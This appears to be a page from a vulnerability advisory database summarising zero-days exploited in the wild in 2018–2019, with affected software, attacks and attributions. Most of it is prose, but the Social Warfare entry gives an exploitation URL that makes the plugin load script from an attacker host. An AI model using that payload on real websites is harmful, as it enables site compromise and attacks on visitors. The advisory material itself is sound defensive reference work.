Zero-day Vulnerability Database

Change view

Zero-day vulnerabilities discovered: 28

Privilege escalation in Microsoft Windows
CVE-2019-1458

Buffer overflow

The vulnerability allows a local user to escalate privileges on the system.

The vulnerability exists due to a boundary error when processing objects in memory within the Win32k component. A local user can create a malicious application, launch it on the system and execute arbitrary code with SYSTEM privileges.

Note, this vulnerability is being actively exploited in the wild.

i

This vulnerability was reported by Anton Ivanov and Alexey Kulaev of Kaspersky Lab. This vulnerability was used in Operation WizardOpium campaign against Korean users.

Software: Windows

This vulnerability was reported by Anton Ivanov and Alexey Kulaev of Kaspersky Lab. This vulnerability was used in Operation WizardOpium campaign against Korean users.

Remote code execution in Draytek Vigor 2960, 3900 and 300B
CVE-2020-8515

Improper Neutralization of Special Elements in Output Used by a Downstream Component

The vulnerability allows a remote attacker to execute arbitrary code on the target system.

The vulnerability exists due to the affected devices allow remote code execution as root (without authentication) via shell metacharacters to the "cgi-bin/mainfunction.cgi" URI.

Note, this vulnerability is being actively exploited in the wild starting from December 4, 2019.

i

The vulnerability in WebUI of DrayTek Vigor enterprise routers is being exploited in the wild at least from December 4, 2019. Two affected scripts are believed to be used by two different attack groups to eavesdrop on FTP and email traffic inside corporate networks.

Software: Vigor 2960

The vulnerability in WebUI of DrayTek Vigor enterprise routers is being exploited in the wild at least from December 4, 2019. Two affected scripts are believed to be used by two different attack groups to eavesdrop on FTP and email traffic inside corporate networks.

Remote code execution in Microsoft Internet Explorer
CVE-2019-1429

Buffer overflow

The vulnerability allows a remote attacker to execute arbitrary code on the target system.

The vulnerability exists due to a boundary error within the scripting engine. A remote attacker can create a specially crafted webpage, trick the victim into opening it, trigger memory corruption and execute arbitrary code on the target system.

Successful exploitation of this vulnerability may result in complete compromise of vulnerable system.

Software: Microsoft Internet Explorer

Remote code execution in Google Chrome
CVE-2019-13720

Use-after-free

The vulnerability allows a remote attacker to compromise vulnerable system.

The vulnerability exists due to a use-after-free error when processing HTML content within the audio component. A remote attacker can create a specially crafted web page, trick the victim into visiting it, trigger a use-after-free error and execute arbitrary code on the target system.

Note, this vulnerability is being actively exploited in the wild.

i

Kaspersky Lab has identified in the wild exploitation of the vulnerability. This vulnerability was used in Operation WizardOpium campaign against Korean users.

Software: Google Chrome

Kaspersky Lab has identified in the wild exploitation of the vulnerability. This vulnerability was used in Operation WizardOpium campaign against Korean users.

Remote code execution in Microsoft Internet Explorer
CVE-2019-1367

Use-after-free

The vulnerability allows a remote attacker to execute arbitrary code on the target system.

The vulnerability exists due to a use-after-free error within the scripting engine in JScript.dll. A remote attacker can create a specially crafted webpage, trick the victim into opening it, trigger memory corruption and execute arbitrary code on the target system.

Successful exploitation of this vulnerability may result in complete compromise of vulnerable system.

Note: this vulnerability is being actively exploited in the wild.

Software: Microsoft Internet Explorer

Privilege escalation in Microsoft Windows Winsock
CVE-2019-1215

Buffer overflow

The vulnerability allows a local user to escalate privileges on the system.

The vulnerability exists due to a boundary error within the ws2ifsl.sys (Winsock). A local user can run a specially crafted application, trigger memory corruption and execute arbitrary code on the target system with elevated privileges.

Note, this vulnerability is being actively exploited in the wild.

Software: Windows

Privilege escalation in Microsoft Windows CLFS
CVE-2019-1214

Buffer overflow

The vulnerability allows a local user to escalate privileges on the system.

The vulnerability exists due to a boundary error within the Windows Common Log File System (CLFS) driver. A local user  can create a specially crafted application and execute arbitrary code on the system with elevated privileges.

Note, this vulnerability is being actively exploited in the wild.

Software: Windows

Privilege escalation in Microsoft Windows Win32k component
CVE-2019-1132

NULL pointer dereference

The vulnerability allows a local user to escalate privileges on the system.

The vulnerability exists due to a NULL pointer dereference  error when processing objects in memory within the Win32k component. A local user can create a malicious application, launch it on the system and execute arbitrary code with SYSTEM privileges.

Note, this vulnerability is being actively exploited in the wild.

i

The vulnerability was discovered by ESET in June 2019 when investigating a highly targeted attack in Eastern Europe.The vulnerability was used in a targeted attack against governmental institutions in Russia by an adversary known as Buhtrap.

Known IoCs:
sha1: CBC93A9DD769DEE98FFE1F43A4F5CADAF568E321

Software: Windows

Known/fameous malware:

Win32/Exploit.CVE-2019-1132.A
VBA/TrojanDropper.Agent.ABM
VBA/TrojanDropper.Agent.AGK
Win32/Spy.Buhtrap.W
Win32/Spy.Buhtrap.AK
Win32/RiskWare.Meterpreter.G

The vulnerability was discovered by ESET in June 2019 when investigating a highly targeted attack in Eastern Europe.The vulnerability was used in a targeted attack against governmental institutions in Russia by an adversary known as Buhtrap.

Known IoCs:
sha1: CBC93A9DD769DEE98FFE1F43A4F5CADAF568E321

Privilege escalation in Microsoft splwow64
CVE-2019-0880

Permissions, Privileges, and Access Controls

The vulnerability allows a local to escalate privileges on the system.

The vulnerability exists due to the way splwow64.exe handles certain calls. A local user can abuse this functionality to elevate privileges on an affected system from low-integrity to medium-integrity.

Note, this vulnerability is being actively exploited in the wild.

Software: Windows

Security restrictions bypass in Mozilla Firefox and Firefox ESR
CVE-2019-11708

Permissions, Privileges, and Access Controls

The vulnerability allows a remote attacker to bypass sandbox restrictions.

The vulnerability exists due to insufficient vetting of parameters passed with the Prompt:Open IPC message between child and parent processes. A remote attacker can create a specially crafted web page that can make the non-sandboxed parent process open web content chosen by a compromised child process.

An attacker can combine this behavior along with another vulnerability to execute arbitrary code on the system with privileges on the current user. 

Note, this vulnerability is being exploited in the wild along with SB2019061805 (CVE-2019-11707)

i

This vulnerability was used along with CVE-2019-11707 in a targeted attack against Conbase.

Software: Mozilla Firefox

This vulnerability was used along with CVE-2019-11707 in a targeted attack against Conbase.

Remote code execution in Oracle WebLogic Server
CVE-2019-2729

Deserialization of Untrusted Data

The vulnerability allows a remote attacker to execute arbitrary code on the target system.

The vulnerability exists due to insecure input validation when processing serialized data within XMLDecoder class. A remote non-authenticated attacker can pass specially crafted data to the application and execute arbitrary code on the target system.

Successful exploitation of this vulnerability may result in complete compromise of vulnerable system.

Note: this vulnerability is being actively exploited in the wild.

i

Oracle has released a security alert, notifying users on in the wild exploitation of the vulnerability.

Software: Oracle WebLogic Server

Oracle has released a security alert, notifying users on in the wild exploitation of the vulnerability.

Remote code execution in Mozilla Firefox and Firefox ESR
CVE-2019-11707

Type Confusion

The vulnerability allows a remote attacker to execute arbitrary code on the target system.

The vulnerability exists due to a type confusion error when manipulating JavaScript objects due to issues in Array.pop. A remote attacker can create a specially crafted web page, trick the victim into visiting it, trigger a type confusion error and execute arbitrary code on the target system.

Successful exploitation of this vulnerability may result in complete compromise of vulnerable system.

Note: this vulnerability is being actively exploited in the wild along with SB2019062002 (CVE-2019-11708).

i

The vulnerability was reported by Mozilla to be actively exploited in the wild.

This vulnerability as reportedly used in a targeted attack against Coinbase employees on Monday,  June 17 2019.

The vulnerability was used in conjunction with another sandbox bypass issue CVE-2019-11708, patched by Mozilla on June 20, 2019.

This vulnerability was  independently discovered and reported to Mozilla by a security researcher Samuel Groß on April 15. It took Mozilla 64 days to issue a security fix. 


Software: Mozilla Firefox

The vulnerability was reported by Mozilla to be actively exploited in the wild.

This vulnerability as reportedly used in a targeted attack against Coinbase employees on Monday,  June 17 2019.

The vulnerability was used in conjunction with another sandbox bypass issue CVE-2019-11708, patched by Mozilla on June 20, 2019.

This vulnerability was  independently discovered and reported to Mozilla by a security researcher Samuel Groß on April 15. It took Mozilla 64 days to issue a security fix. 


Privilege escalation in Windows Error Reporting
CVE-2019-0863

Input validation error

The vulnerability allows a local user to escalate privileges on the system.

The vulnerability exists due to the way Windows Error Reporting (WER) handles files. A local user can create a specially crafted WER file and execute arbitrary code on the system in kernel mode.

Note: this vulnerability is being actively exploited in the wild.

Software: Windows

Remote code execution in WhatsApp
CVE-2019-3568

Buffer overflow

The vulnerability allows a remote attacker to execute arbitrary code on the target system.

The vulnerability exists due to a boundary error within the WhatsApp VOIP stack when processing SRTCP packets. A remote attacker can send a series of specially crafted SRTCP packets sent to a target phone number, trigger buffer overflow and execute arbitrary code on the target device.

Successful exploitation of this vulnerability may result in complete compromise of vulnerable system.

Note: this vulnerability is being actively exploited in the wild.

i

The vulnerability was used in a targeted attack against a limited number of people. First vulnerability exploitation was detected on May 12 2019. The attackers targeted a phone of a UK-based human rights lawyer to install spyware.

Software: WhatsApp Messenger for Android

Known/fameous malware:

Pegasus

The vulnerability was used in a targeted attack against a limited number of people. First vulnerability exploitation was detected on May 12 2019. The attackers targeted a phone of a UK-based human rights lawyer to install spyware.

Improper access control in Yuzo Related Posts WordPress plugin

Improper access control

The vulnerability allows a remote attacker to gain unauthorized access to the website.

The vulnerability exists due to improper access restrictions when processing HTTP requests. A remote attacker can pass specially crafted configuration to the affected application and inject arbitrary JavaScript code WordPress configuration.

Successful exploitation of the vulnerability may allow an attacker to compromise vulnerable application.

Note: the vulnerability is being actively exploited i the wild.

Not patched
i

Improper access control vulnerability in the plugin allowed attacker to inject malicious JavaScript code and redirect users to phishing websites.

Software: Related Posts

Improper access control vulnerability in the plugin allowed attacker to inject malicious JavaScript code and redirect users to phishing websites.

Privilege escalation in Win32k.sys driver in Microsoft Windows
CVE-2019-0859

Buffer overflow

The vulnerability allows a local user to escalate privileges on the system.

The vulnerability exists due to a boundary error when processing objects in memory within the Win32k component. A local user can create a malicious application, launch it on the system and execute arbitrary code with SYSTEM privileges.

Note: this vulnerability is being actively exploited in the wild.

i

The vulnerability was reported to Microsoft by Vasily Berdnikov and Boris Larin from Kaspersky Lab.

Software: Windows

The vulnerability was reported to Microsoft by Vasily Berdnikov and Boris Larin from Kaspersky Lab.

Privilege escalation in Win32k.sys driver in Microsoft Windows
CVE-2019-0803

Buffer overflow

The vulnerability allows a local user to escalate privileges on the system.

The vulnerability exists due to a boundary error when processing objects in memory within the Microsoft Graphics Win32k component. A local user can create a malicious application, launch it on the system and execute arbitrary code with SYSTEM privileges.

Note: this vulnerability is being actively exploited in the wild.

i

The vulnerability was reported to Microsoft by Donghai Zhu of Alibaba Cloud Intelligence Security Team.

Software: Windows

The vulnerability was reported to Microsoft by Donghai Zhu of Alibaba Cloud Intelligence Security Team.

Backdoor in Asus Live Update

Hidden functionality (backdoor)

The vulnerability allows a remote attacker to compromise vulnerable system

The vulnerability exists due to hidden functionality (backdoor) is present in software. A remote attacker can use this functionality to gain full access to the application and compromise the affected system.

Note: this backdoor was implented as a result of ASUS servers compromise within the APT attack dubbed “Operation ShadowHammer”. The campaign ran from June to at least November 2018.

i

An APT campaign was launched against ASUS between June and November 2018. The attacker compromised ASA Live Update servers and distributed malware to cca. 1 million computers worldwide. 

The attack was attributed to APT17 adversary, also known as Deputy Dog.

Software: ASUS Live Update

An APT campaign was launched against ASUS between June and November 2018. The attacker compromised ASA Live Update servers and distributed malware to cca. 1 million computers worldwide. 

The attack was attributed to APT17 adversary, also known as Deputy Dog.

Stored XSS in Social Warfare WordPress plugin
CVE-2019-9978

Cross-site scripting

The vulnerability allows a remote attacker to perform cross-site scripting attacks.

The vulnerability exists due to usage of the eval() JavaScript call on data passed via the  "swp_url" HTTP GET parameter to "/wp-admin/admin-post.php" script, when "swp_debug" is set to "load_options", allowing to permanently inject and execute arbitrary JavaScript code on the website. A remote unauthenticated attacker can store a specially crafted JavaScript code into database and execute it in browser of every website visitor.

Note: this vulnerability is being actively exploited in the wild.

Exploitation example:

http://[host]/wp-admin/admin-post.php?swp_debug=load_options&swp_url=http://[malicious_js_script]/
i

A stored XSS vulnerability in the Social Warfare plugin, used by 70 000 users, led to a mass hacking campaign of WordPress websites.

Software: WordPress Social Sharing Plugin – Social Warfare

A stored XSS vulnerability in the Social Warfare plugin, used by 70 000 users, led to a mass hacking campaign of WordPress websites.

Insecure deserialization in Easy WP SMTP plugin for WordPress

Deserialization of Untrusted Data

The vulnerability allows a remote attacker to compromise vulnerable website.

The vulnerability exists due to insecure input validation when processing serialized data passed via the "swpsmtp_import_settings" HTTP POST parameter to /easy-wp-smtp.php script. A remote unauthenticated attacker can import arbitrary wp_options and reconfigure WordPress to allow user registration with administrative privileges.

Successful exploitation of this vulnerability may result in complete compromise of vulnerable website.

Note: this vulnerability is being actively exploited in the wild.

i

WordPress websites were under attack due to vulnerability in a popular WP plugin since March 15, 2019.

Software: Easy WP SMTP

WordPress websites were under attack due to vulnerability in a popular WP plugin since March 15, 2019.

Privilege escalation in Microsoft Windows Win32k.sys driver
CVE-2019-0797

Memory corruption

The vulnerability allows a local user to escalate privileges on the system.

The vulnerability exists due to a boundary error within the Win32k.sys driver. A local user can execute a specially crafted application, trigger memory corruption and execute arbitrary code on the target system with elevated privileges.

Successful exploitation of this vulnerability may result in complete compromise of vulnerable system.

i

Kaspersky Lab has detected and reported a zero-day vulnerability in Win32k.sys driver in Microsoft Windows.

Software: Windows

Kaspersky Lab has detected and reported a zero-day vulnerability in Win32k.sys driver in Microsoft Windows.

Privilege escalation in Microsoft Windows
CVE-2019-0808

NULL pointer dereference

The vulnerability allows a local user to escalate privileges on the system.

The vulnerability exists due to a NULL pointer dereference error in the win32k!MNGetpItemFromIndex when NtUserMNDragOver() system call within the win32k.sys kernel driver. A local user can use a specially crafted application to escape sandbox and execute arbitrary code on the target system with SYSTEM privileges.

Note, this vulnerability is being actively exploited in the wild along with vulnerability in Google Chrome described in (SB2019030405).

i

On March 7th Google has reported in the wild exploitation of vulnerability in Microsoft Windows. During the attack the adversary used another zero-day vulnerability in Google Chrome in order to execute code on the system and vulnerability in Microsoft Windows to escalate privileges.
The initial attack was detected in late February.

Software: Windows

On March 7th Google has reported in the wild exploitation of vulnerability in Microsoft Windows. During the attack the adversary used another zero-day vulnerability in Google Chrome in order to execute code on the system and vulnerability in Microsoft Windows to escalate privileges.
The initial attack was detected in late February.

Remote code execution in Google Chrome
CVE-2019-5786

Use-after-free

The vulnerability allows a remote attacker to compromise vulnerable system.

The vulnerability exists due to a use-after-free error in FileReader. A remote attacker can trick the victim into opening a specially crafted file with Google Chrome, trigger use-after-free error and execute arbitrary code on the target system.

Successful exploitation of the vulnerability may allow an attacker to compromise vulnerable system.

Note: the vulnerability is being exploited in the wild.

i

The vulnerability in Google Chrome was used in a targeted attack along with another zero-day in Microsoft Windows.

The initial attack was detected in late February.

Software: Google Chrome

The vulnerability in Google Chrome was used in a targeted attack along with another zero-day in Microsoft Windows.

The initial attack was detected in late February.

Dangerous file upload in Adobe ColdFusion
CVE-2019-7816

Dangerous file upload

The vulnerability allows a remote attacker to execute arbitrary code on the target system.

The vulnerability exists due to insufficient validation of user-supplied input when processing file uploads. A remote attacker can upload and execute arbitrary code on the target system with privileges of the ColdFusion service. Successful exploitation of the vulnerability requires that the attacker has the ability to upload files.

Note, this vulnerability is being actively exploited in the wild.

Software: ColdFusion

Information disclosure via PDF files in Google Chrome

Exposed dangerous method or function

The vulnerability allows a remote attacker to gain access to potentially sensitive information.

The vulnerability exists due to the PDF viewer allows sending information to a third-party domain via the "this.submitForm()" PDF Javascript API. A remote attacker can trick the victim into opening a specially crafted PDF file with Google Chrome and obtain sensitive information.

Note: the vulnerability is being actively exploited in the wild.

Not patched
i

Vulnerability exploitation was spotted by EdgeSpot in late December 2018. The company detected multiple PDF samples in the wild that use dangerous JavaScript method to send information, retrieved from user's computer to a third-party domain.

Software: Google Chrome

Vulnerability exploitation was spotted by EdgeSpot in late December 2018. The company detected multiple PDF samples in the wild that use dangerous JavaScript method to send information, retrieved from user's computer to a third-party domain.

Information Disclosure in Microsoft Internet Explorer
CVE-2019-0676

Out-of-bounds read

The vulnerability allows a remote attacker to gain access to potentially sensitive information.

The vulnerability exists due to boundary error when processing HTML content. A remote attacker can trick the victim to open a specially crafted webpage, trigger out-of-bounds read and test for the presence of files on disk.

Software: Microsoft Internet Explorer

Multiple vulnerabilities in Apple iOS
CVE-2019-7287

Privilege escalation

The vulnerability allows a local attacker to gain elevated privileges.

The weakness exists due to a boundary error in the IOKit component when handling malicious input. A local attacker can run a specially crafted application, trigger memory corruption and execute arbitrary code with elevated privileges.

Successful exploitation of the vulnerability may result in system compromise.

Note: according to Ben Hawkes, team leader at Project Zero, the vulnerability has been exploited in the wild as 0day.
i

According to Ben Hawkes, team leader at Project Zero, the vulnerability has been exploited in the wild as 0day.

Software: Apple iOS

According to Ben Hawkes, team leader at Project Zero, the vulnerability has been exploited in the wild as 0day.

Multiple vulnerabilities in Apple iOS
CVE-2019-7286

Memory corruption

The vulnerability allows a local attacker to gain elevated privileges.

The weakness exists due to a boundary error in the Foundation component when handling malicious input. A local attacker can run a specially crafted application, trigger memory corruption and gain elevated privileges.

Note: according to Ben Hawkes, team leader at Project Zero, the vulnerability has been exploited in the wild as 0day.
i

According to Ben Hawkes, team leader at Project Zero, the vulnerability has been exploited in the wild as 0day.

Software: Apple iOS

According to Ben Hawkes, team leader at Project Zero, the vulnerability has been exploited in the wild as 0day.